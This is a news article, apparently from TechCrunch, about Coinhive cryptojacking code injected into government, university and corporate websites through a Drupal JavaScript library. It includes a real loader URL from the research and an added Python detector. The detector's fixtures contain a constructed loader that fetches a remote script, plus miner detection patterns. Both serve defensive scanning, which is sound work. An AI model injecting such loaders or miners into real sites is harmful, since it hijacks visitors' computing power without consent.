
Cryptojacking malware secretly mined Monero on many government and university websites – TechCrunch

A new report published by security researcher Troy Mursch details how the cryptocurrency mining code known as Coinhive is infiltrating unsuspecting sites on the web. Recently, Mursch detected Coinhive code running on almost 400 websites, including those belonging to the San Diego Zoo, Lenovo and the National Labor Relations Board. The full list is available here.

Notably, the list names a number of governmental and educational websites, including the Equal Employment Opportunity Commission (EEOC) of the Office of the Inspector General and sites for the University of Aleppo and the UCLA Oceanic and Atmospheric Sciences program.

Most of the affected sites are hosted by Amazon and are located in the United States, and Mursch believes they were compromised through an outdated version of Drupal:

"Digging deeper into the cryptojacking campaign, I found in both cases that Coinhive was injected using the same method. The malicious code was in the JavaScript library '/misc/jquery.once.js?v=1.2'. Shortly thereafter, I received notifications from additional compromised sites that used a load. However, all infected sites pointed to the same domain using the same Coinhive site key.

Once the code was deobfuscated, the reference to 'http://vuuwd.com/t.js'. When visiting the URL, the ugly truth was revealed: a slightly accelerated implementation of Coinhive was found."

Coinhive, a JavaScript program, mines the cryptocurrency known as Monero in the background through a web browser. While Coinhive is not intrinsically malicious, it can be injected into an unsuspecting site's code in a "cryptojacking" attack, forcing visitors' browsers to mine Monero without the victim's knowledge.
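A site owner can check served JavaScript files, such as the jquery.once.js library named in the quote above, for the traits described there: an escaped loader pointing at a remote script, Coinhive API calls, and a site key that can be compared across sites. The following is an added example, not code from the report or from TechCrunch; the sample strings, the cdn.example.invalid URL and the EXAMPLEKEY0000 key are constructed, and only simple \x and \u string escapes are decoded.

```python
import re

# Public names of the Coinhive in-browser miner script and API.
MINER_PATTERNS = [
    re.compile(r"coinhive(?:\.min)?\.js", re.I),
    re.compile(r"CoinHive\.(?:Anonymous|User)\s*\("),
]
SITE_KEY = re.compile(r"CoinHive\.(?:Anonymous|User)\s*\(\s*['\"]([A-Za-z0-9]+)['\"]")
REMOTE_SCRIPT = re.compile(r"https?://[^\s'\"<>)]+\.js", re.I)
ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})")


def decode_escapes(js: str) -> str:
    """Undo \\xNN and \\uNNNN string escapes, a common light obfuscation layer."""
    return ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), js)


def scan_js(source: str) -> dict:
    """Report miner indicators, site keys and remote script URLs in one JS file."""
    decoded = decode_escapes(source)
    return {
        "obfuscated": decoded != source,
        "miner": any(p.search(decoded) for p in MINER_PATTERNS),
        "site_keys": sorted(set(SITE_KEY.findall(decoded))),
        "remote_scripts": sorted(set(REMOTE_SCRIPT.findall(decoded))),
    }


# Constructed samples: a clean library file, the same file with an escaped
# loader appended, and the kind of second-stage script such a loader fetches.
CLEAN = "(function ($) { $.fn.once = function (id, fn) { return this; }; })(jQuery);"
url = "http://cdn.example.invalid/t.js"  # placeholder, not a real indicator
escaped = "".join("\\x%02x" % ord(c) for c in url)
INJECTED = (CLEAN + '\nvar s=document.createElement("script");s.src="'
            + escaped + '";document.head.appendChild(s);')
SECOND_STAGE = "var m = new CoinHive.Anonymous('EXAMPLEKEY0000'); m.start();"

if __name__ == "__main__":
    for name, js in [("clean", CLEAN), ("injected", INJECTED), ("second stage", SECOND_STAGE)]:
        print(name, scan_js(js))
```

A remote script URL that appears only after decoding in a core library file is worth investigating even when no miner string is present, since the miner itself lives in the second-stage file.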
